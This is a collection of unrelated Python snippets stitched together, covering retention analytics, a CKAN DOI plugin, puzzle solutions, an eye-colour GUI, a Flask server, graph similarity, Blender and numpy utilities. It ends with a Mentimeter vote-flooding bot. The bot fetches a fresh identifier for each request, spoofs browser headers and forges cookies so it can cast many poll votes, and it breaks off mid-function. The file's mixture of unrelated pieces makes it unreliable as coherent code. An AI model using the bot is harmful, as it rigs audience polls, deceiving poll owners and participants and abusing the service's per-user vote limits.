tx_user_ratio = tx_uk.query("UserType == 'New'").groupby(['InvoiceYearMonth'])['CustomerID'].nunique()/tx_uk.query("UserType == 'Existing'").groupby(['InvoiceYearMonth'])['CustomerID'].nunique()
tx_user_ratio = tx_user_ratio.reset_index()
tx_user_ratio = tx_user_ratio.dropna()
# print the dataframe (bare expression: only renders in a notebook)
tx_user_ratio
# plot the result
plot_data = [
    go.Bar(
        x=tx_user_ratio.query("InvoiceYearMonth>201101 and InvoiceYearMonth<201112")['InvoiceYearMonth'],
        y=tx_user_ratio.query("InvoiceYearMonth>201101 and InvoiceYearMonth<201112")['CustomerID'],
    )
]
plot_layout = go.Layout(
    xaxis={"type": "category"},
    title='New Customer Ratio'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# Monthly Retention Rate
# Monthly Retention Rate = Retained Customers From Prev. Month / Active Customers Total
# (pandas crosstab() makes building the customer-by-month activity matrix easy)
# identify which users are active by looking at their revenue per month
tx_user_purchase = tx_uk.groupby(['CustomerID', 'InvoiceYearMonth'])['Revenue'].sum().reset_index()
# create retention matrix with crosstab: one row per customer, one column per month
tx_retention = pd.crosstab(tx_user_purchase['CustomerID'], tx_user_purchase['InvoiceYearMonth']).reset_index()
tx_retention.head()
# create an array of dictionaries which keeps Retained & Total User count for each month
months = tx_retention.columns[2:]
retention_array = []
for i in range(len(months) - 1):
    retention_data = {}
    selected_month = months[i + 1]
    prev_month = months[i]
    retention_data['InvoiceYearMonth'] = int(selected_month)
    retention_data['TotalUserCount'] = tx_retention[selected_month].sum()
    # retained = active in both the selected month and the previous month
    retention_data['RetainedUserCount'] = \
        tx_retention[(tx_retention[selected_month] > 0) & (tx_retention[prev_month] > 0)][selected_month].sum()
    retention_array.append(retention_data)
# convert the array to dataframe and calculate Retention Rate
tx_retention = pd.DataFrame(retention_array)
tx_retention['RetentionRate'] = tx_retention['RetainedUserCount'] / tx_retention['TotalUserCount']
# plot the retention rate graph
plot_data = [
    go.Scatter(
        x=tx_retention.query("InvoiceYearMonth<201112")['InvoiceYearMonth'],
        y=tx_retention.query("InvoiceYearMonth<201112")['RetentionRate'],
        name="organic"
    )
]
plot_layout = go.Layout(
    xaxis={"type": "category"},
    title='Monthly Retention Rate'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# Cohort Based Retention Rate
# create our retention table again with crosstab() and add first purchase year month view
tx_retention = pd.crosstab(tx_user_purchase['CustomerID'], tx_user_purchase['InvoiceYearMonth']).reset_index()
tx_retention = pd.merge(tx_retention, tx_min_purchase[['CustomerID', 'MinPurchaseYearMonth']], on='CustomerID')
# prefix month columns with 'm_' so they can be referenced in DataFrame.query()
new_column_names = ['m_' + str(column) for column in tx_retention.columns[:-1]]
new_column_names.append('MinPurchaseYearMonth')
tx_retention.columns = new_column_names
# create the array of Retained users for each cohort monthly
# (reuses `months` computed in the previous section)
retention_array = []
for i in range(len(months)):
    retention_data = {}
    selected_month = months[i]
    prev_months = months[:i]
    next_months = months[i + 1:]
    # months before the cohort's first purchase are undefined
    for prev_month in prev_months:
        retention_data[prev_month] = np.nan
    total_user_count = tx_retention[tx_retention.MinPurchaseYearMonth == selected_month].MinPurchaseYearMonth.count()
    retention_data['TotalUserCount'] = total_user_count
    # by definition 100% of the cohort is active in its first month
    retention_data[selected_month] = 1
    query = "MinPurchaseYearMonth == {}".format(selected_month)
    for next_month in next_months:
        new_query = query + " and {} > 0".format(str('m_' + str(next_month)))
        retention_data[next_month] = np.round(
            tx_retention.query(new_query)['m_' + str(next_month)].sum() / total_user_count, 2)
    retention_array.append(retention_data)
tx_retention = pd.DataFrame(retention_array)
tx_retention.index = months
# showing the new cohort based retention table (bare expression: only renders in a notebook)
tx_retention
|
# Print a sentence inside a box centred on the screen, sized to fit the text.
# (translated from the original Chinese comment)
sentence = input("Please input Sentence: ")
screen_width = 150   # assumed terminal width — TODO confirm
text_length = len(sentence)
# NOTE(review): the drawn box is text_length+4 characters wide, but the
# margin is computed from text_length+6, so centring is off by one — confirm.
box_width = text_length + 6
left_margin = (screen_width - box_width) // 2
print()
print(' ' * left_margin + '+' + '-' * (box_width-4) + '+')
print(' ' * left_margin + '| ' + ' ' * text_length + ' |')
print(' ' * left_margin + '| ' + sentence + ' |')
print(' ' * left_margin + '| ' + ' ' * text_length + ' |')
print(' ' * left_margin + '+' + '-' * (box_width-4) + '+')
print() |
"""
CKAN DOI Plugin
"""
from pylons import config
from datetime import datetime
from logging import getLogger
import ckan.plugins as p
import ckan.logic as logic
from ckan.lib import helpers as h
from ckan import model
from ckanext.doi.model import doi as doi_model
from ckanext.doi.lib import get_doi, publish_doi, update_doi, create_unique_identifier, get_site_url, build_metadata, validate_metadata, record_existing_unique_identifier, check_existing_doi
from ckanext.doi.helpers import package_get_year, now, get_site_title
get_action = logic.get_action
log = getLogger(__name__)
class DOIPlugin(p.SingletonPlugin, p.toolkit.DefaultDatasetForm):
    """
    CKAN DOI Extension

    Mints DataCite DOIs for datasets and keeps their metadata in sync.
    NOTE(review): this is a Python 2 codebase (pylons import, `cmp` builtin
    in after_update) — it will not run unmodified on Python 3.
    """
    p.implements(p.IConfigurable)
    p.implements(p.IConfigurer)
    p.implements(p.IPackageController, inherit=True)
    p.implements(p.ITemplateHelpers, inherit=True)
    p.implements(p.IValidators)

    # IValidators
    def get_validators(self):
        # expose the duplicate-DOI check as the 'doi' field validator
        return {
            'doi': check_existing_doi
        }

    # IConfigurable
    def configure(self, config):
        """
        Called at the end of CKAN setup.
        Create DOI table (only once the core package table exists).
        """
        if model.package_table.exists():
            doi_model.doi_table.create(checkfirst=True)

    # IConfigurer
    def update_config(self, config):
        # Add this extension's templates to CKAN's template search path
        p.toolkit.add_template_directory(config, 'theme/templates')

    # IPackageController
    def after_create(self, context, pkg_dict):
        """
        A new dataset has been created, so we need to create a new DOI
        NB: This is called after creation of a dataset, and before resources have been added so state = draft
        @param context:
        @param pkg_dict:
        @return: pkg_dict
        """
        # Only create a new DOI if the user has requested it
        # (signalled by the presence of the 'dataset_category' key)
        if "dataset_category" in pkg_dict:
            # Load the local DOI
            doi = get_doi(pkg_dict['id'])
            # There is a chance that a doi has already been created for this pkg_id
            # and could cause an integrity error if another is added
            if not doi:
                # Create a new doi
                create_unique_identifier(pkg_dict['id'])
            # Remove the auto create field from the dataset pkg
            pkg_dict.pop('dataset_category')
        return pkg_dict

    # IPackageController
    def after_update(self, context, pkg_dict):
        """
        Dataset has been created / updated
        Check status of the dataset to determine if we should publish DOI to datacite network
        @param pkg_dict:
        @return: pkg_dict
        """
        package_id = pkg_dict['id']
        # Load the original package, so we can determine if user has changed any fields
        orig_pkg_dict = get_action('package_show')(context, {
            'id': package_id
        })
        # Metadata created isn't populated in pkg_dict - so copy from the original
        pkg_dict['metadata_created'] = orig_pkg_dict['metadata_created']
        # Load the local DOI
        doi = get_doi(package_id)
        # Auto create overwrites anything in identifier
        # a DOI or identifier might already exist and in this case that DOI will be used
        if not doi:
            if 'doi_auto_create' in pkg_dict:
                # Overwrite any existing identifier with a newly minted DOI
                create_unique_identifier(package_id)
                # Remove the auto create field from the dataset pkg
                pkg_dict.pop('doi_auto_create')
            else:
                # no DOI and none requested: nothing more to do
                return pkg_dict
        # TODO: Handle manual input again
        # Is this active and public? If so we need to make sure we have an active DOI
        if pkg_dict.get('state', 'active') == 'active' and not pkg_dict.get('private', False):
            # Build the metadata dict to pass to DataCite service
            metadata_dict = build_metadata(pkg_dict, doi)
            # Perform some basic checks against the data - we require at the very least
            # title and author fields - they're mandatory in the DataCite Schema
            # This will only be an issue if another plugin has removed a mandatory field
            validate_metadata(metadata_dict)
            # Is this an existing DOI? Update it
            if doi.published:
                # Before updating, check if any of the metadata has been changed - otherwise
                # We end up sending loads of revisions to DataCite for minor edits
                # Load the current version
                orig_metadata_dict = build_metadata(orig_pkg_dict, doi)
                # Check if the two dictionaries are the same
                # (cmp is a Python 2 builtin; returns 0 when equal)
                if cmp(orig_metadata_dict, metadata_dict) != 0:
                    # Not the same, so we want to update the metadata
                    update_doi(package_id, **metadata_dict)
                    h.flash_success('DataCite DOI metadata updated')
                # TODO: If editing a dataset older than 5 days, create DOI revision
            # New DOI - publish to datacite
            else:
                h.flash_success('DataCite DOI created')
                publish_doi(package_id, **metadata_dict)
        return pkg_dict

    # IPackageController
    def after_show(self, context, pkg_dict):
        # Load the DOI ready to display in templates
        doi = get_doi(pkg_dict['id'])
        if doi:
            pkg_dict['doi'] = doi.identifier
            pkg_dict['doi_status'] = True if doi.published else False
            pkg_dict['domain'] = get_site_url().replace('http://', '')
            pkg_dict['doi_date_published'] = datetime.strftime(
                doi.published, "%Y-%m-%d") if doi.published else None
            pkg_dict['doi_publisher'] = config.get("ckanext.doi.publisher")

    # ITemplateHelpers
    def get_helpers(self):
        # template helpers exposed to the theme
        return {
            'package_get_year': package_get_year,
            'now': now,
            'get_site_title': get_site_title
        }
|
# Given a string and a non-negative int n, we'll say that the front of the string is the first 3 chars, or whatever is there if the string is less than length 3. Return n copies of the front;
#
# front_times('Chocolate', 2) → 'ChoCho'
# front_times('Chocolate', 3) → 'ChoChoCho'
# front_times('Abc', 3) → 'AbcAbcAbc'
def front_times(str, n):
    """Return n copies of the first 3 characters of `str` (or all of it
    when shorter).

    BUG FIX: the original printed instead of returning (violating its own
    spec and the examples above), sliced 4 characters with str[:4], and
    printed n*n copies by combining a loop with `* n`.
    """
    # str[:3] is safe for strings shorter than 3 characters
    return str[:3] * n

print(front_times("abc", 3))
# stdlib
import os
import sys

# third-party
import cv2
import numpy as np  # used by scanPhoto's HSV thresholding
from PIL import Image, ImageQt
from PyQt5 import QtWidgets, QtQuick, QtCore, QtGui
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QMessageBox, QFileDialog

# local
import design
# Shared Qt stylesheet prefix for the buttons; callers append a background
# colour plus extra rules, e.g. base_style + "green;color:white;".
base_style =" cursor:pointer;\
border-style: outset;\
border-width: 2px;\
border-radius: 10px;\
border-color: beige;\
font: bold 14px;\
min-width: 10em;\
padding: 6px;\
max-height: 80px;\
background-color:"
class App(QtWidgets.QMainWindow, design.Ui_MainWindow):
    """Main window: lets the user pick an eye photo and estimates eye colour
    by HSV thresholding."""
    img = None   # PIL image currently selected (None when nothing is chosen)
    path = None  # filesystem path of the selected image

    # HSV (min, max) ranges per candidate colour — calibration values,
    # TODO confirm against real samples
    COLOR_RANGES = {
        ((20, 19, 8), (210, 165, 126)): "blue",
        ((6, 23, 66), (53, 58, 103)): "brown",
        ((22, 25, 30), (169, 164, 144)): "grey",
    }

    def __init__(self):
        super(App, self).__init__()
        self.setupUi(self)
        # wire the buttons to their handlers
        self.selectBtn.clicked.connect(self.chooseButtonClick)
        self.statBtn.clicked.connect(self.getStat)
        self.scanBtn.clicked.connect(self.scanPhoto)

    def getImage(self):
        """Ask the user for an image, show a thumbnail and verify it contains
        exactly one eye via the Haar cascade."""
        try:
            self.path = QFileDialog.getOpenFileName(self, 'Choose image', 'Desktop', 'Image files (*.png *.jpg)')[0]
            # BUG FIX: the original referenced undefined locals `path`/`img`
            # instead of the instance attributes (NameError at runtime).
            print(self.path)
            self.img = Image.open(self.path)
            # BUG FIX: thumbnail() resizes in place and returns None, so the
            # original passed None to ImageQt; use self.img after resizing.
            self.img.thumbnail((170, 170))
            self.selectLbl.setPixmap(QtGui.QPixmap.fromImage(ImageQt.ImageQt(self.img)))
            self.selectBtn.setStyleSheet(base_style + "red;color:white;")
            self.scanBtn.setStyleSheet(base_style + "green;color:white;")
            self.selectBtn.setText("Скасувати вибір")
            cvimg = cv2.imread(self.path)
            gray = cv2.cvtColor(cvimg, cv2.COLOR_BGR2GRAY)
            eyeCascade = cv2.CascadeClassifier('haarcascade_eye.xml')
            eyes = eyeCascade.detectMultiScale(
                gray,
                scaleFactor=1.3,
                minNeighbors=3,
                minSize=(30, 30)
            )
            # exactly one eye must be visible for the colour scan to work
            if len(eyes) != 1:
                QMessageBox.warning(self, "Dr.Aid", "Something went wrong...")
                self.clearAll()
        except Exception:
            # keep the UI alive on any failure (cancelled dialog, bad file, ...)
            QMessageBox.warning(self, "Dr.Aid", "Something went wrong...")

    def scanPhoto(self):
        """Classify the eye colour: threshold the image in HSV with each
        candidate range and pick the range matching the most pixels."""
        if self.img is None:
            QMessageBox.warning(self, "Dr.Aid", "Something went wrong...")
            return None
        cvimg = cv2.imread(self.path)
        # BUG FIX: the original converted an undefined name `img`.
        hsv = cv2.cvtColor(cvimg, cv2.COLOR_BGR2HSV)
        max_white, best_bounds, color = 0, None, ""
        for bounds in self.COLOR_RANGES:
            hsv_min = np.array(bounds[0], np.uint8)
            hsv_max = np.array(bounds[1], np.uint8)
            thresh = cv2.inRange(hsv, hsv_min, hsv_max)
            # count pixels inside (255) / outside the range; replaces the
            # original per-pixel Python loops
            white = int(np.count_nonzero(thresh == 255))
            black = thresh.size - white
            if white > max_white:
                max_white = white
                color = self.COLOR_RANGES[bounds]
                best_bounds = bounds
            print("White: ", white, "Black: ", black, "color", self.COLOR_RANGES[bounds])
        print("Eye color: ", color)
        if best_bounds is None:
            # no range matched a single pixel — nothing sensible to display
            QMessageBox.warning(self, "Dr.Aid", "Something went wrong...")
            return None
        # re-threshold with the winning range to show the mask to the user
        hsv_min = np.array(best_bounds[0], np.uint8)
        hsv_max = np.array(best_bounds[1], np.uint8)
        thresh = cv2.inRange(hsv, hsv_min, hsv_max)
        showimage = Image.fromarray(cv2.cvtColor(thresh, cv2.COLOR_BGR2RGB))
        showimage.thumbnail((170, 170))
        # BUG FIX: this line had an extra closing parenthesis (SyntaxError).
        self.selectLbl.setPixmap(QtGui.QPixmap.fromImage(ImageQt.ImageQt(showimage)))
        self.reztextLbl.setText("Eye color: " + color)

    def clearAll(self):
        """Reset the selection and all labels to their initial state."""
        # BUG FIX: the original assigned a local `img` instead of the
        # attribute, so the selection was never actually cleared.
        self.img = None
        self.path = None
        self.selectLbl.setPixmap(QtGui.QPixmap.fromImage(ImageQt.ImageQt(Image.open("white.png"))))
        self.rezultLbl.setPixmap(QtGui.QPixmap.fromImage(ImageQt.ImageQt(Image.open("white.png"))))
        self.selectBtn.setText("Виберіть фотографію")
        self.selectBtn.setStyleSheet(base_style + "green;color:white;")
        self.scanBtn.setStyleSheet(base_style + "red;color:white;")
        self.reztextLbl.setText("")

    def chooseButtonClick(self):
        """Toggle between selecting a photo and clearing the selection."""
        print("I am clicked!!!")
        if self.selectBtn.text() == "Виберіть фотографію":
            self.getImage()
        else:
            self.clearAll()

    def getStat(self):
        """Statistics view — not implemented yet."""
        QMessageBox.warning(self, "Dr.Aid", "In developing...")
def main():
    """Create the Qt application, show the main window and run its event loop."""
    application = QtWidgets.QApplication(sys.argv)
    main_window = App()
    main_window.show()
    application.exec_()
if __name__ == "__main__":
    main()
|
from typing import List
def checkio(numbers: List[int]) -> int:
    """Sum the even-indexed items, multiplied by the last item (0 for empty input)."""
    if numbers:
        return sum(numbers[0::2]) * numbers[-1]
    return 0
|
# my_dict ={}
# my_dict['name']="veeresh"
# my_dict['age']=29
#
# for k,l in my_dict.items():
# print(k , l)
class note:
    """Scratch record holding placeholder note fields."""
    ip = ""   # placeholder host/IP string
    url = 5   # placeholder value (an int here; presumably meant to hold a URL)
# BUG FIX: the original wrote `obj1 = note`, which binds the class object
# itself, so obj1 and obj2 were just aliases of `note`, not instances.
obj1 = note()
obj2 = note()
print()
|
from flask import Flask, render_template, send_file, abort
from pathlib import Path
import json
from sys import version_info
from dataclasses import dataclass
from time import time
# Flask application wiring: create the app and log the interpreter version
# for debugging.
app = Flask(__name__)
app.logger.debug(f'{version_info}')
# Project root and its static/ subdirectory.
mypath = Path('.')
statics = mypath / 'static'
# Server start time; file ages are reported relative to it (see sketch_page).
tstart = time()
@dataclass
class Sketch:
    """Display metadata for one sketch: its name and a short description."""
    name: str
    desc: str
@app.route('/')
def start():
    """Landing page: list every '*.proj' directory as an available sketch."""
    sketches = []
    for proj in mypath.glob('*.proj'):
        if proj.is_dir():
            sketch = proj.stem
            app.logger.debug(f'found sketch {sketch}')
            sketches.append(Sketch(sketch, '?'))
    return render_template('index.html', sketches=sketches)
@app.route('/sketch/<sketch>')
def sketch_page(sketch):
    """Render the viewer page for one sketch.

    404s when the sketch directory or its cfg.json is missing. The template
    receives the script list, the dom/sound feature flags (defaulting to
    off) and the age of the newest file relative to server start.
    """
    sketch_dir = mypath / (sketch + '.proj')
    if not sketch_dir.is_dir():
        abort(404)
    config_file = sketch_dir / 'cfg.json'
    if not config_file.exists():
        abort(404)
    with config_file.open('r') as jf:
        config = json.load(jf)
    # Optional feature flags default to off (idiomatic replacement for the
    # original `if not "x" in config` checks).
    config.setdefault("dom", False)
    config.setdefault("sound", False)
    # Newest modification time among the sketch's files; cfg.json exists,
    # so the list is never empty.
    mtimes = [f.stat().st_mtime for f in sketch_dir.iterdir() if not f.is_dir()]
    return render_template('sketch.html', sketch=sketch, scripts=config['script_list'],
        title=sketch, dom=config["dom"], sound=config["sound"], latest=max(mtimes)-tstart)
@app.route('/sketch/<sketch>/<script>')
def sketch(sketch, script):
    """Serve a script from a shared directory or from the sketch's .proj dir."""
    if sketch in ('p5', 'common', 'static'):
        base = mypath / sketch
    else:
        base = mypath / (sketch + '.proj')
    return send_file(base / script)
|
import numpy as np
import random
import pandas as pd
from sampling_train_test_split import*
import numpy.matlib
class similarity(object):
    """Base class for similarity scores on adjacency matrices."""
    def fit(self, train_adj):
        """Validate that train_adj is a square matrix with at least 2 entries.

        Raises Exception on a wrong ndim, size or non-square shape.
        """
        matrix = np.matrix(train_adj)
        if matrix.ndim < 2:
            raise Exception("Invalid ndim!", matrix.ndim)
        if matrix.size < 2:
            raise Exception("Invalid size!", matrix.size)
        if matrix.shape[0] != matrix.shape[1]:
            raise Exception("Invalid shape!", matrix.shape)
class CommonNeighbors(similarity):
    """Common-neighbours score: entry (i, j) counts neighbours shared by i and j."""
    def fit(self, train_adj):
        """Return A·A for the validated adjacency matrix A."""
        similarity.fit(self, train_adj)
        adj = np.matrix(train_adj)
        return adj * adj
class Jaccard(similarity):
    """Jaccard similarity: |N(u) ∩ N(v)| / |N(u) ∪ N(v)| for every vertex pair."""
    def fit(self, train_adj):
        """Return the Jaccard similarity matrix of the adjacency matrix.

        Entries whose union is empty (isolated vertex pairs) are mapped to 0.
        """
        similarity.fit(self, train_adj)
        adj = np.matrix(train_adj)
        numerator = adj * adj  # common-neighbour counts
        deg0 = np.matlib.repmat(adj.sum(0), len(adj), 1)
        deg1 = np.matlib.repmat(adj.sum(1), 1, len(adj))
        denominator = deg0 + deg1 - numerator  # union size (inclusion-exclusion)
        # Suppress the divide-by-zero / 0/0 RuntimeWarnings: the resulting
        # nan/inf entries are explicitly zeroed just below.
        with np.errstate(divide='ignore', invalid='ignore'):
            sim = numerator / denominator
        sim[np.isnan(sim)] = 0
        sim[np.isinf(sim)] = 0
        return sim
#denominator =
'''
test
nodepair_set = [[0,1],[0,2],[1,2],[1,5],[1,3],[3,4],[3,5],[3,4],[2,5],[2,0]]
Ja = Jaccard()
vertex_dic = create_vertex(nodepair_set)
matrix_train = create_adjmatrix(nodepair_set,vertex_dic)
print(vertex_dic)
print(matrix_train)
print(Ja.fit(matrix_train))
'''
|
# https://codeforces.com/problemset/problem/1250/F
# Minimum perimeter of a rectangle with integer sides and area n: scan
# divisors downward from sqrt(n); the first hit gives the most square shape.
n = int(input())
side = int(n ** 0.5)
while side > 0:
    if n % side == 0:
        other = n // side
        print(2 * (other + side))
        break
    side -= 1
|
import bpy
import random
objects = bpy.data.objects
# Collect pass indices that are already in use. The 'none': 0 seed keeps
# index 0 in the occupied set — presumably because 0 is Blender's default
# "unset" pass index and should never be handed out (TODO confirm).
occupied_index = {'none':0}
for obj in objects:
    if obj.pass_index != 0:
        occupied_index[obj] = obj.pass_index
#print(occupied_index)
# Meshes and empties that do not yet have a pass index assigned.
accepted_objects = []
for obj in objects:
    if (obj.type == 'MESH' or obj.type == 'EMPTY') and obj not in occupied_index.keys():
        accepted_objects.append(obj)
# Candidate pool: enough indices for every object, minus the taken ones.
index_list = list(range(len(accepted_objects) + len(set(occupied_index.values()))))
accepted_index = list(set(index_list) - set(occupied_index.values()))
#print(len(accepted_index))
#print(len(accepted_objects))
# Hand out the remaining indices randomly, one unique index per object.
for obj in accepted_objects:
    val = random.choice(accepted_index)
    obj.pass_index = val
    accepted_index.remove(val)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import tkinter as tk
class ProgressBar(tk.Text):
    """A read-only Text widget that renders a dot-based progress bar."""
    def __init__(self, parent, bg, fg, font, color, max_value):
        """Build a bar of max_value dots; `color` paints the filled prefix."""
        super(ProgressBar, self).__init__(parent, bd=0, pady=0, padx=0,
                                          highlightthickness=0)
        # Filled dots are rendered by tagging a prefix of the single line.
        self.tag_config('colored', foreground=color)
        self.insert(tk.END, '•' * max_value)
        self.configure(bg=bg, fg=fg, font=font)
        self.configure(width=max_value - 4, height=1)  # bad hack :(
        self.configure(state=tk.DISABLED)
    def set_value(self, value):
        """Colour the first `value` dots of the bar."""
        self.configure(state=tk.NORMAL)
        self.tag_remove('colored', '1.0', tk.END)
        self.tag_add('colored', '1.0', '1.%d' % value)
        self.configure(state=tk.DISABLED)
|
import numpy as np
# Public API of this vector-utility module.
__all__ = [
    'angle_between',
    'cat',
    'derivative',
    'ecat',
    'norm',
    'norm0',
    'projection',
    'unit',
]
def angle_between(a, b, axisa=0, axisb=0):
    """Compute the angle between arrays of vectors `a` and `b`.

    `axisa`/`axisb` select the component axis of each array.
    """
    import ein
    cos = ein.dot(a, b, axisa=axisa, axisb=axisb) / (norm(a, axisa) * norm(b, axisb))
    # Clamp to the valid arccos domain: rounding error can push |cos|
    # slightly above 1, which would otherwise yield NaN.
    return np.arccos(np.clip(cos, -1.0, 1.0))
def cat(*arrays):
    """Concatenate arrays along a new prepended axis."""
    pieces = []
    for array in arrays:
        pieces.append(array[np.newaxis])
    return np.concatenate(pieces)
def derivative(t):
    """Create a callable that differentiates an array with respect to `t`.

    `t` is the sample-point array; the returned `gradient` function
    computes np.gradient of its argument using `t`'s spacing.
    """
    if t.ndim > 1:
        try:
            dt = np.gradient(t)[0]
        except ValueError:
            # np.gradient rejects singleton dimensions: squeeze them away,
            # then restore the trailing axis.
            dt = np.gradient(np.squeeze(t))[..., np.newaxis]
        # Move the last axis to the front so components can be zipped below.
        dt = np.rollaxis(dt, -1, 0)
    else:
        dt = np.gradient(t)
    def gradient(array):
        # One shared spacing vs. per-component spacings.
        if dt.ndim == 1:
            return np.gradient(array, dt)
        else:
            return ecat(*[np.gradient(x, dx)
                          for x, dx in zip(np.rollaxis(array, -1, 0), dt)])
    return gradient
def ecat(*arrays):
    """Concatenate arrays along a new appended axis."""
    pieces = []
    for array in arrays:
        pieces.append(array[..., np.newaxis])
    return np.concatenate(pieces, axis=-1)
def norm(array, axis=0):
    """Norm of `array` along `axis`."""
    try:
        return np.linalg.norm(array, axis=axis)
    except TypeError:
        # Older numpy without the `axis` keyword: manual sum of squares.
        squares = (component ** 2 for component in np.rollaxis(array, axis))
        return np.sqrt(sum(squares))
def norm0(array):
    """Compute the norm of an array along the first axis."""
    return norm(array, 0)
def projection(a, b, axisa=0, axisb=0):
    """Compute the component of `a` in the direction of `b`."""
    import ein
    dot_ab = ein.dot(a, b, axisa=axisa, axisb=axisb)
    return dot_ab / norm(b, axisb)
def unit(array, axis=0):
    """Compute the unit vectors of `array` along `axis`."""
    magnitude = norm(array, axis)
    return array / magnitude
|
def minimumBribes(q):
    """Print the minimum number of bribes that produced queue q, or 'Too chaotic'.

    q holds 1-based sticker numbers in their final order. A person may
    bribe (overtake) at most twice, so anyone more than two places ahead
    of their sticker number makes the state impossible.

    Improvements over the bubble-sort original: the input list is no
    longer mutated, the scan stops as soon as chaos is detected, and
    counting overtakers only inspects the positions a person could have
    started from — O(n) passes instead of repeated O(n^2) sweeps.
    """
    bribes = 0
    for pos, sticker in enumerate(q):
        # More than two places ahead of the original spot: impossible.
        if sticker - (pos + 1) > 2:
            print('Too chaotic')
            return
        # Everyone who overtook `sticker` now stands between position
        # sticker-2 and pos holding a larger sticker number.
        for j in range(max(0, sticker - 2), pos):
            if q[j] > sticker:
                bribes += 1
    print(bribes)
# import json
# import grequests
# import requests
# import _thread
# import time
from tkinter import ttk
class Bot:
    """Tkinter GUI bot that floods a Mentimeter word-cloud poll with votes.

    Worker threads repeatedly request an identifier from menti.com and
    post votes with it; a small progress window tracks completion. All
    dependencies are imported lazily via __import__ as class attributes,
    so importing this module does not immediately pull them in.
    """
    # Shared run configuration / counters.
    # NOTE(review): these are CLASS attributes; voteText = [] is a mutable
    # default shared across instances until shadowed in __init__ — confirm
    # only one Bot is ever alive at a time.
    threads = 0
    numberOfRequests = 0
    numberOfRequests *= 1
    requestCount = 0
    requestDoneCount = 0
    voteIdx = 0
    voteText = []
    parsedId = ""
    parsedKey = ""
    done = False
    # Lazy module handles, accessed as self.<name> throughout.
    json = __import__('json')
    grequests = __import__('grequests')
    requests = __import__('requests')
    _thread = __import__('_thread')
    time = __import__('time')
    mttkinter = __import__('mttkinter')
    tk = mttkinter.mtTkinter
    tkinter = __import__('tkinter', globals(), locals(), ['ttk'], 0)
    ttk = tkinter.ttk
    threading = __import__('threading')
    math = __import__('math')
    def updateProgress(self):
        """Refresh the percentage label and ASCII bar; stop the run at 100%."""
        self.percentage = round(100*(self.requestDoneCount/self.numberOfRequests), 1)
        print(self.percentage)
        oldLabel = self.logLabel.cget("text")
        if oldLabel != str(self.percentage) + '%':
            self.logLabel.configure(text=(str(self.percentage) + '%'))
        # Rebuild the 10-slot bar: one '#' per completed 10%.
        barStr ='__________'
        barStrList = list(barStr)
        for idx in range(self.math.floor(self.percentage/10)):
            barStrList[idx] = '#'
        barStr = ''.join(barStrList)
        self.logText.configure(text=barStr)
        if self.percentage == 100.0:
            self.stop()
    def printw(self, string):
        """Logging stub; UI updates from worker threads are disabled."""
        # self.addText(string)
        # self.root.after(5000, lambda: self.addText(string))
        pass
    def addText(self, string):
        """Append a line of text to the log label."""
        old = self.logText.cget("text")
        new = old+"\n"+string
        self.logText.configure(text=new)
    def __init__(self, threadToCall, parsedId, voteText, threads, numberOfRequests, perWord):
        """Configure the run, open the progress window and start the workers.

        threadToCall is started once this window closes; perWord multiplies
        the request budget by the number of words to be voted.
        """
        self.threadToCall = threadToCall
        self.done = False
        self.parsedId = parsedId
        self.voteText = voteText
        self.threads = threads
        self.numberOfRequests = numberOfRequests
        if perWord:
            self.numberOfRequests *= len(self.voteText)
        self.root = self.tk.Tk()
        self.root.bind("<Destroy>", self.destroy)
        self.logLabel = self.tk.LabelFrame(self.root, text="0%")
        self.logText=self.tk.Label(self.logLabel, text='__________', height=1, width=10, anchor='nw', justify='left')
        self.logLabel.pack(padx=10, pady=10, side='top')
        self.logText.pack()
        self.stopBtn = self.ttk.Button(self.root, text='Stop', command=(lambda: self.stop()))
        self.stopBtn.pack(padx=10, pady=10, side='bottom')
        self.startThreads()
        self.tk.mainloop()
    def destroy(self, event):
        """Window destroyed -> stop the run."""
        self.stop()
    def stop(self):
        """Flag workers to finish, close the UI and hand off to threadToCall."""
        self.done = True
        self.stopBtn.update()
        # self.time.sleep(2)
        self.root.destroy()
        self.callThread()
        # self.exit()
    def callThread(self):
        """Start the follow-up thread supplied by the caller."""
        self.threadToCall.start()
    # def defNew(voteTextIn, threadsIn, numberOfRequestsIn, numberOfRequestsMultiIn, requestCountIn, requestDoneCountIn):
    # reset()
    # self.threads = threadsIn
    # self.numberOfRequests = numberOfRequestsIn
    # self.numberOfRequests *= numberOfRequestsMultiIn
    # self.requestCount = requestCountIn
    # self.requestDoneCount = requestDoneCountIn
    # self.voteText = voteTextIn
    # def reset():
    # self.threads = 0
    # self.numberOfRequests = 0
    # self.requestCount = 0
    # self.requestDoneCount = 0
    # self.voteIdx = 0
    def vote(self, voteIn):
        """Submit one vote: fetch a fresh identifier, then post the payload."""
        # voteIn is the text to be voted with
        newdata = {"question_type":"wordcloud","vote":voteIn}
        # s = grequests.post('https://www.govote.at/core/identifier')
        #print(s)
        # identifier = s.json()['identifier']
        # It seems the page rejects GET requests that do not identify a User-Agent.
        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
        content = ""
        # urls = ['https://www.menti.com/core/identifier'] # old
        urls = ['https://www.menti.com/core/identifiers'] # new
        rs = (self.grequests.post(u, headers=headers) for u in urls)
        requests = self.grequests.map(rs)
        for response in requests:
            content = response.content
        identifier = self.json.loads(content)['identifier']
        self.printw(identifier)
        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36', 'accept': 'application/json','accept-encoding': 'gzip, deflate, br','accept-language': 'en-US,en;q=0.9','content-lengt': '42','content-type': 'application/json; charset=UTF-8','cookie': '_ga=GA1.2.1555705289.1573573495; _fbp=fb.1.1573573435740.1944003412; identifier1='+identifier+'; _gid=GA1.2.1316845992.1575545568; _gat=1; _gat_UA-23693781-9=1; _gat_UA-23693781-3=1','origin': 'https://www.menti.com','referer': 'https://www.menti.com/'+self.parsedId,'sec-fetch-mode': 'cors','sec-fetch-site': 'same-origin','user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 OPR/65.0.3467.48','x-identifier': identifier}
        # print(headers)
        content = ""
